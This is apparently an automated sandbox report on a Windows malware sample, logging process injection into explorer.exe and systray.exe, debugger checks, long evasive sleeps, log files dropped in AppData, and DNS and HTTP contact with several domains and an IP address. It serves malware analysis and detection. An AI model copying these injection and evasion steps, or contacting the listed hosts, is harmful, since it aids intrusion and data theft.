| Read | \??\C:\Windows\SysWOW64\systray.exe | offset = 0, size = 8192 |
|
1 |
Process (6)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\explorer.exe | type = PROCESS_WOW64_INFORMATION |
|
1 | |
| Get Info | c:\windows\explorer.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\windows\syswow64\systray.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\systray.exe | desired_access = PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 |
Thread (8)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | c:\windows\explorer.exe | os_tid = 0x464 |
|
1 | |
| Open | c:\windows\syswow64\systray.exe | os_tid = 0xbe8 |
|
1 | |
| Suspend | c:\windows\explorer.exe | os_tid = 0x464 |
|
1 | |
| Get Context | c:\windows\explorer.exe | os_tid = 0x464 |
|
1 | |
| Queue APC | c:\windows\explorer.exe | os_tid = 0x464 |
|
1 | |
| Set Context | c:\windows\explorer.exe | os_tid = 0x464 |
|
1 | |
| Resume | c:\windows\explorer.exe | os_tid = 0x464 |
|
1 | |
| Resume | c:\windows\syswow64\systray.exe | os_tid = 0xbe8 |
|
1 |
Memory (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | c:\windows\explorer.exe | address = 0x6efd000, size = 680 |
|
1 | |
| Read | c:\windows\syswow64\systray.exe | address = 0x7efde008, size = 4 |
|
1 | |
| Read | c:\windows\syswow64\systray.exe | address = 0x6b0000, size = 20480 |
|
1 |
Module (13)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | advapi32.dll | base_address = 0x0 |
|
1 | |
| Load | user32.dll | base_address = 0x0 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 3662584 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 3660828 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 3662584 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 3662600 |
|
1 | |
| Map | - | process_name = c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x140000 |
|
1 | |
| Map | - | process_name = c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x7d0000 |
|
1 | |
| Map | - | process_name = c:\windows\explorer.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x6e70000 |
|
1 | |
| Map | - | process_name = c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1b0000 |
|
1 | |
| Map | - | process_name = c:\windows\syswow64\systray.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x70000 |
|
1 | |
| Map | - | process_name = c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x20000 |
|
1 | |
| Map | - | process_name = c:\windows\syswow64\systray.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x6b0000 |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 3660052 milliseconds (3660.052 seconds) |
|
1 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
2 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Set Environment String | name = 598MPR44, value = C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, environment = 0 |
|
1 |
Debug (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Check for Presence | c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe | - |
|
1 |
Process #10: explorer.exe
468
14
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\explorer.exe |
| Command Line | C:\Windows\Explorer.EXE |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:20, Reason: Injection |
| Unmonitor | End Time: 00:04:40, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:20 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x460 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A38
0x
67C
0x
7E8
0x
6DC
0x
328
0x
69C
0x
5FC
0x
5EC
0x
5C0
0x
774
0x
698
0x
688
0x
674
0x
67C
0x
5B8
0x
5AC
0x
58C
0x
588
0x
574
0x
568
0x
558
0x
554
0x
550
0x
514
0x
4B0
0x
4A4
0x
494
0x
490
0x
48C
0x
46C
0x
464
0x
898
0x
748
0x
670
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00021fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x001bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00270fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x002f1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x00315fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00320fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x00330fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00341fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0044ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x0052efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x00530fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00757fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x008e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x01ceffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001cf0000 | 0x01cf0000 | 0x020e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000020f0000 | 0x020f0000 | 0x02105fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002110000 | 0x02110000 | 0x02110fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002120000 | 0x02120000 | 0x02177fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002180000 | 0x02180000 | 0x021ebfff | Private Memory | rw |
|
|
|
- |
| private_0x00000000021f0000 | 0x021f0000 | 0x0226ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02270000 | 0x0253efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002540000 | 0x02540000 | 0x02541fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002550000 | 0x02550000 | 0x02551fff | Pagefile Backed Memory | r |
|
|
|
- |
| comctl32.dll.mui | 0x02560000 | 0x02562fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002570000 | 0x02570000 | 0x02570fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002580000 | 0x02580000 | 0x02580fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002590000 | 0x02590000 | 0x0260ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002610000 | 0x02610000 | 0x02633fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002640000 | 0x02640000 | 0x02641fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002650000 | 0x02650000 | 0x0274ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002750000 | 0x02750000 | 0x02758fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002760000 | 0x02760000 | 0x02767fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x027b7fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027c0000 | 0x027c0000 | 0x027c3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000027d0000 | 0x027d0000 | 0x027d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000027e0000 | 0x027e0000 | 0x027e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000027f0000 | 0x027f0000 | 0x028effff | Private Memory | rw |
|
|
|
- |
| thumbcache_96.db | 0x028f0000 | 0x029effff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x029f0000 | 0x029fbfff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02a00000 | 0x02a07fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02a10000 | 0x02a1ffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000002a20000 | 0x02a20000 | 0x02a20fff | Pagefile Backed Memory | rw |
|
|
|
- |
| index.dat | 0x02a30000 | 0x02a3ffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000002a40000 | 0x02a40000 | 0x02a41fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002a50000 | 0x02a50000 | 0x02a52fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002a60000 | 0x02a60000 | 0x02a61fff | Pagefile Backed Memory | r |
|
|
|
- |
| actioncenter.dll.mui | 0x02a70000 | 0x02a74fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002a80000 | 0x02a80000 | 0x02a8ffff | Private Memory | rwx |
|
|
|
- |
| thumbcache_32.db | 0x02ad0000 | 0x02ad0fff | Memory Mapped File | rw |
|
|
|
- |
| thumbcache_1024.db | 0x02ae0000 | 0x02ae0fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000002af0000 | 0x02af0000 | 0x02e32fff | Pagefile Backed Memory | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db | 0x02e40000 | 0x02e5ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002e60000 | 0x02e60000 | 0x02e60fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x02e70000 | 0x02e73fff | Memory Mapped File | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x02e80000 | 0x02eaffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x02eb0000 | 0x02eb3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002ec0000 | 0x02ec0000 | 0x02ec1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002ed0000 | 0x02ed0000 | 0x02ed1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002ee0000 | 0x02ee0000 | 0x02f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f60000 | 0x02f60000 | 0x02f63fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f70000 | 0x02f70000 | 0x02f73fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002f80000 | 0x02f80000 | 0x02f81fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002f90000 | 0x02f90000 | 0x02f90fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fa0000 | 0x02fa0000 | 0x02fa0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fb0000 | 0x02fb0000 | 0x0302ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003030000 | 0x03030000 | 0x03030fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003040000 | 0x03040000 | 0x03040fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003050000 | 0x03050000 | 0x03050fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003060000 | 0x03060000 | 0x03060fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003070000 | 0x03070000 | 0x030effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000030f0000 | 0x030f0000 | 0x030f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000003100000 | 0x03100000 | 0x03101fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x03110000 | 0x03113fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000003120000 | 0x03120000 | 0x03121fff | Pagefile Backed Memory | r |
|
|
|
- |
| {40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db | 0x03130000 | 0x03130fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x03140000 | 0x03143fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003150000 | 0x03150000 | 0x03150fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003160000 | 0x03160000 | 0x03160fff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x03170000 | 0x031d5fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000031e0000 | 0x031e0000 | 0x031e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x031f0000 | 0x031f3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003200000 | 0x03200000 | 0x03200fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000003210000 | 0x03210000 | 0x03211fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003220000 | 0x03220000 | 0x0322ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003230000 | 0x03230000 | 0x03230fff | Pagefile Backed Memory | r |
|
|
|
- |
| {0448dc77-1f74-49f5-ba7e-8de74fa55642}.2.ver0x0000000000000001.db | 0x03240000 | 0x03240fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x03250000 | 0x03253fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003260000 | 0x03260000 | 0x032dffff | Private Memory | rw |
|
|
|
- |
| {9d8c497c-611a-4408-acad-eadee99a69bf}.2.ver0x0000000000000001.db | 0x032e0000 | 0x032e0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000032f0000 | 0x032f0000 | 0x032f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003300000 | 0x03300000 | 0x03300fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003310000 | 0x03310000 | 0x03310fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003320000 | 0x03320000 | 0x03320fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003330000 | 0x03330000 | 0x03330fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003340000 | 0x03340000 | 0x03340fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003350000 | 0x03350000 | 0x03350fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003360000 | 0x03360000 | 0x03361fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003370000 | 0x03370000 | 0x03370fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003380000 | 0x03380000 | 0x033fffff | Private Memory | rw |
|
|
|
- |
| thumbcache_sr.db | 0x03400000 | 0x03400fff | Memory Mapped File | rw |
|
|
|
- |
| thumbcache_idx.db | 0x03410000 | 0x03410fff | Memory Mapped File | rw |
|
|
|
- |
| thumbcache_32.db | 0x03420000 | 0x03420fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000003430000 | 0x03430000 | 0x0347ffff | Private Memory | rw |
|
|
|
- |
| thumbcache_1024.db | 0x03480000 | 0x03480fff | Memory Mapped File | rw |
|
|
|
- |
| thumbcache_sr.db | 0x03490000 | 0x03490fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00000000034a0000 | 0x034a0000 | 0x034a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000034b0000 | 0x034b0000 | 0x034b1fff | Pagefile Backed Memory | r |
|
|
|
- |
| oleaccrc.dll | 0x034c0000 | 0x034c0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000034d0000 | 0x034d0000 | 0x0354ffff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x03550000 | 0x03e7ffff | Memory Mapped File | r |
|
|
|
- |
| thumbcache_idx.db | 0x03e80000 | 0x03e80fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000003ec0000 | 0x03ec0000 | 0x03ec0fff | Pagefile Backed Memory | r |
|
|
|
- |
| wdmaud.drv.mui | 0x03ed0000 | 0x03ed0fff | Memory Mapped File | rw |
|
|
|
- |
| mmdevapi.dll.mui | 0x03ee0000 | 0x03ee0fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000003ef0000 | 0x03ef0000 | 0x03ef1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f00000 | 0x03f00000 | 0x03f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f80000 | 0x03f80000 | 0x03fb2fff | Private Memory | rw |
|
|
|
- |
| thumbcache_32.db | 0x03fd0000 | 0x03fd0fff | Memory Mapped File | rw |
|
|
|
- |
| thumbcache_1024.db | 0x04000000 | 0x04000fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000004010000 | 0x04010000 | 0x0408ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004090000 | 0x04090000 | 0x0410ffff | Private Memory | rw |
|
|
|
- |
| thumbcache_sr.db | 0x04110000 | 0x04110fff | Memory Mapped File | rw |
|
|
|
- |
| thumbcache_idx.db | 0x04120000 | 0x04120fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000004130000 | 0x04130000 | 0x04131fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004180000 | 0x04180000 | 0x04181fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000041a0000 | 0x041a0000 | 0x041a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000041b0000 | 0x041b0000 | 0x0422ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004230000 | 0x04230000 | 0x04230fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004240000 | 0x04240000 | 0x04240fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000042d0000 | 0x042d0000 | 0x042d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| bthprops.cpl.mui | 0x042e0000 | 0x042e6fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00000000042f0000 | 0x042f0000 | 0x042f1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004300000 | 0x04300000 | 0x0437ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004380000 | 0x04380000 | 0x0457ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004580000 | 0x04580000 | 0x04581fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000045f0000 | 0x045f0000 | 0x045fffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 255 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #9: c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe | 0xbdc | address = 0x6e70000, size = 946176 |
|
1 | |
| Modify Control Flow | #9: c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe | 0xbdc | os_tid = 0x464, address = 0x0 |
|
1 | |
| Modify Control Flow | #9: c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe | 0xbdc | os_tid = 0x464, address = 0x6eba2b9 |
|
1 | |
| Modify Memory | #11: c:\windows\syswow64\systray.exe | 0xbe8 | address = 0x7a30000, size = 10240000 |
|
1 | |
| Modify Memory | #11: c:\windows\syswow64\systray.exe | 0xbe8 | address = 0x8400000, size = 1097728 |
|
1 | |
| Modify Control Flow | #11: c:\windows\syswow64\systray.exe | 0xbe8 | os_tid = 0x464, address = 0x42 |
|
1 | |
| Modify Control Flow | #11: c:\windows\syswow64\systray.exe | 0xbe8 | os_tid = 0x464, address = 0x84862a2 |
|
1 |
Host Behavior
File (33)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946log00.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logri.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrf.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrt.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrg.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrc.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrm.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logrv.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logro.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logcl.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\9468738F\946logim.jpeg | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 |
Process (387)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\SysWOW64\lsm.exe | os_pid = 0x0, creation_flags = CREATE_SUSPENDED, CREATE_DETACHED_PROCESS, CREATE_NO_WINDOW, show_window = SW_HIDE |
|
190 | |
| Create | C:\Windows\SysWOW64\wuauclt.exe | os_pid = 0x0, creation_flags = CREATE_SUSPENDED, CREATE_DETACHED_PROCESS, CREATE_NO_WINDOW, show_window = SW_HIDE |
|
196 | |
| Create | C:\Windows\SysWOW64\systray.exe | os_pid = 0xbe4, creation_flags = CREATE_SUSPENDED, CREATE_DETACHED_PROCESS, CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 |
System (47)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 2000 milliseconds (2.000 seconds) |
|
47 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = S-1-5-21-2345716-11203441957301 |
|
1 |
Network Behavior
DNS (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = www.melvelazco.biz, service = 80 |
|
1 | |
| Resolve Name | host = www.loscaballerosdelzodiaco.net, service = 80 |
|
1 | |
| Resolve Name | host = www.kitetou.com, address_out = 146.66.85.39, service = 80 |
|
1 |
TCP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 177 bytes |
| Total Data Received | 684 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 146.66.85.39:80 |
TCP Session #1
| Information | Value |
|---|---|
| Handle | 0x740 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 146.66.85.39 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49183 |
| Data Sent | 177 bytes |
| Data Received | 684 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 146.66.85.39, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 177, size_out = 177 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2048000, size_out = 684 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 177 bytes |
| Total Data Received | 684 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | www.kitetou.com |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | www.kitetou.com |
| Server Port | 80 |
| Data Sent | 177 |
| Data Received | 684 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
